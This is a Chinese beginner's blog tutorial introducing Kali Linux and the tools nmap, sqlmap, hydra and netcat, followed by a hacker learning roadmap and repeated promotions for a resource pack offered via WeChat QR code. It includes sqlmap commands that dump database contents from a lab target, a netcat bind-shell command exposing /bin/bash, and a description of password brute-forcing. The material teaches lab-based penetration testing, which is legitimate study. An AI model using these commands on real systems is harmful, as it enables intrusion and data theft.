【2024版】最新kali linux入门及常用简单工具介绍（非常详细）从零基础入门到精通，看完这一篇就够了

前言

相信很多同学了解到和学习网络安全的时候都听过kali系统，大家都称之为黑客最喜爱的系统，那么什么是kali，初学者用kali能做些什么，大白我将在本文中做详细的介绍：

Kali Linux 是专门用于渗透测试的Linux操作系统，它由BackTrack发展而来。在整合了IWHAX、WHOPPIX和Auditor这三种渗透测试专用Live Linux后,BackTrack正式改名为Kali LInux。没错，kali的本质也是linux系统，就好比以前的黑客经常使用一些工具，久而久之的大家就共同开源了一个集成了各种黑客工具系统。至于为什么黑客都喜欢使用kali，主要是在kali中工具齐全避免了在需要使用的时候发现工具需要再下载安装的麻烦

二、安装下载kali

kali的官网地址：https://www.kali.org

目前kali仍然在保持着更新，目前最新的kali系统为kali purple，里面继承了更多的防守方使用的工具。

下载解压后用vm打开即可，默认root账号密码均为kali，kali。没有用过VMware的同学可以先到网上学习如何下载vm。另外新手可能会遇到虚拟机没有网络的问题，新手我这里推荐配置网卡时选择直接连接，等之后了解到网卡网段的知识可以再自己配置想要的网卡信息。（左上角虚拟机，设置，网络适配器，桥接模式，复制物理网络连接状态）

三、kali常见工具介绍

正如刚才所说，kali里集成了大量的黑客工具和网络安全相关工具，可以说黑客需要做的所有事情在这个系统中都有工具可以实现。下面我推荐几个新手入门可以用到的小工具。

1.nmap

nmap被称为诸神之眼，是一款非常强大的网络探测工具，可以实现主机发现和端口扫描，同时自身也可带漏洞扫描的脚本可以完成对主机端口的漏洞扫描

nmap最基础用法：

nmap [目的ip]``nmap 192.168.1.10``   ``nmap [目的网段]``nmap 192.168.1.0/24

map也提供了大量的扫描时候可以设置的参数，下面将举例常用的参数：

添加参数可以显示出不同的扫描结果

2.sqlmap

sqlmap是针对sql注入漏洞的一款自动化sql注入探测工具，支持多种操作系统环境和多种数据库的漏洞探测，渗透测试人员常常调侃“没有什么操作技术，就是sqlmap一把梭哈，屏幕显示绿了就直接下班”

sqlmap的基本使用:

sqlmap -u "www.baidu.com"

大家尽量不要在未授权的情况下去对公网资产进行批量扫描，小心去踩缝纫机哦

下面我以sqli-lab里面的靶场为例：

出现图中绿色信息说明sqlmap对该参数成功注入，注意我的url中在最后以GET方式输入了参数id（/?id），如果不给sqlmap提供参数sqlmap是无法使用的哦

找到注入点后的步骤基本是确定的

 `sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1"  --dbs  #获取当前数据库服务所开启的数据库名称` `sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1"  -D 数据库名 --tables  #获取某数据库下的所有表名` `sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1"  -D 数据库名 -T 表名 --columns #获取D数据库下T表内的所有字段``sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1"  -D 数据库名 -T 表名 -C 字段名 --dump  #将该字段的内容全部获取出来并存储，在最后的信息中会有存储路径信息`

第一步获取数据库：

第二步获取数据库下表名：

第三步获取该表字段（其实到表名这一步可以直接–dump获取表里所有内容）

所以sqlmap的使用难处在于如何找到注入点，也就是找到产生sql注入的参数，在例子里参数是GET方式上传的“id”参数，下面提供一些sqlmap常用的参数

3.hydra

hydra又称九头蛇，是一款非常高效的多种协议都可以使用的爆破工具，对指定ip的指定服务进行爆破，需要输入爆破使用的字典或者自己指定爆破使用的数据（比如在已知账号为admin时爆破密码）

在kali中hydra有图形化和命令行两种使用方式

对于新手来说，图形化界面更加简易好用，下面介绍图形化使用

之后选择start就好了，hydra会使用字典中的所有账号密码去做登陆的爆破尝试

4.netcat

netcat简称nc，是一款目前最常用网络工具，它提供基于socket协议套接字针对TCP，UDP连接的网络使用，在具有nc使用权时几乎可以建立任何类型的连接，通常在渗透测试中用该工具获得目的ip的shell

nc简单使用方式：建立连接传输信息

主机1：开启对6666端口的监听

nc -lvp 6666

参数解释：

主机2：连接主机1的6666端口

nc 192.168.0.163 6666

nc常用使用：获取远程主机shell

1.正向连接shell

主机1：

nc -lvp 6666 -e /bin/bash

参数解释：

这里将主机1的/bin/bash重定向到了自己主机的6666端口

主机2：

nc 192.168.0.163 6666

大家可以思考一下为什么左边会有下面的报错呢？并且在执行sudo su尝试进入root权限时，必须在左侧主机输入密码才可以进入，进入后才会收到来自右侧发来的密码kali并且产生报错。可以尝试了解不同终端bash/zsh/sh的区别

总结

本文简单介绍了kali系统，只是适合对没有了解过的新手小白的一个引导

关于我

笔者本人 17 年就读于一所普通的本科学校，20 年 6 月在三年经验的时候顺利通过校招实习面试进入大厂，现就职于某大厂安全联合实验室。

如何自学黑客&网络安全

黑客零基础入门学习路线&规划

初级黑客
1、网络安全理论知识（2天）
①了解行业相关背景，前景，确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。（非常重要）

2、渗透测试基础（一周）
①渗透测试的流程、分类、标准
②信息收集技术：主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理，利用方法、工具（MSF）、绕过IDS和反病毒侦察
④主机攻防演练：MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础（一周）
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全（系统入侵排查/系统加固基础）

4、计算机网络基础（一周）
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析（HTTP、TCP/IP、ARP等）
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御：主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作（2天）
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透（1周）
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具：Nmap、BurpSuite、SQLMap、其他（菜刀、漏扫等）

恭喜你，如果学到这里，你基本可以从事一份网络安全相关的工作，比如渗透测试、Web 渗透、安全服务、安全分析等岗位；如果等保模块学的好，还可以从事等保工程师。薪资区间6k-15k

到此为止，大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗？

如果你想要入坑黑客&网络安全，笔者给大家准备了一份：282G全网最全的网络安全资料包需要保存下方图片，微信扫码即可前往获取!

因篇幅有限，仅展示部分资料，需要扫下方即可前往获取

7、脚本编程（初级/中级/高级）
在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中，面对复杂多变的网络环境，当常用工具不能满足实际需求的时候，往往需要对现有工具进行扩展，或者编写符合我们要求的工具、自动化脚本，这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中，想要高效地使用自制的脚本工具来实现各种目的，更是需要拥有编程能力.

如果你零基础入门，笔者建议选择脚本语言Python/PHP/Go/Java中的一种，对常用库进行编程学习；搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP， IDE强烈推荐Sublime；·Python编程学习，学习内容包含：语法、正则、文件、网络、多线程等常用库，推荐《Python核心编程》，不要看完；·用Python编写漏洞的exp,然后写一个简单的网络爬虫；·PHP基本语法学习并书写一个简单的博客系统；熟悉MVC架构，并试着学习一个PHP框架或者Python框架 (可选)；·了解Bootstrap的布局或者CSS。

8、超级黑客
这部分内容对零基础的同学来说还比较遥远，就不展开细说了，附上学习路线。

网络安全工程师企业级学习路线

攻击和防守要学的东西也不少，具体要学的东西我都写在了上面的路线图，如果你能学完它们，你去就业和接私活完全没有问题。

视频配套资料&国内外网安书籍、文档&工具

当然除了有配套的视频，同时也为大家整理了各种文档和书籍资料&工具，并且已经帮大家分好类了。

一些笔者自己买的、其他平台白嫖不到的视频教程。

如果你想要入坑黑客&网络安全，笔者给大家准备了一份：282G全网最全的网络安全资料包免费领取！

因篇幅有限，仅展示部分资料，需要扫下方即可前往获取

工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在信息收集、Android黑客工具、自动化工具、网络钓鱼等，感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包，需要的话也可以拿走。

因篇幅有限，仅展示部分资料，需要扫下方即可前往获取

最后就是我这几年整理的网安方面的面试题，如果你是要找网安方面的工作，它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的，如果大家有好的题目或者好的见解欢迎分享。

参考解析：深信服官网、奇安信官网、Freebuf、csdn等

内容特点：条理清晰，含图像化表示更加易懂。

内容概要：包括内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

因篇幅有限，仅展示部分资料，需要扫下方即可前往获取

结语

网络安全产业就像一个江湖，各色人等聚集。相对于欧美国家基础扎实（懂加密、会防护、能挖洞、擅工程）的众多名门正派，我国的人才更多的属于旁门左道（很多白帽子可能会不服气），因此在未来的人才培养和建设上，需要调整结构，鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”，才能解人才之渴，真正的为社会全面互联网化提供安全保障。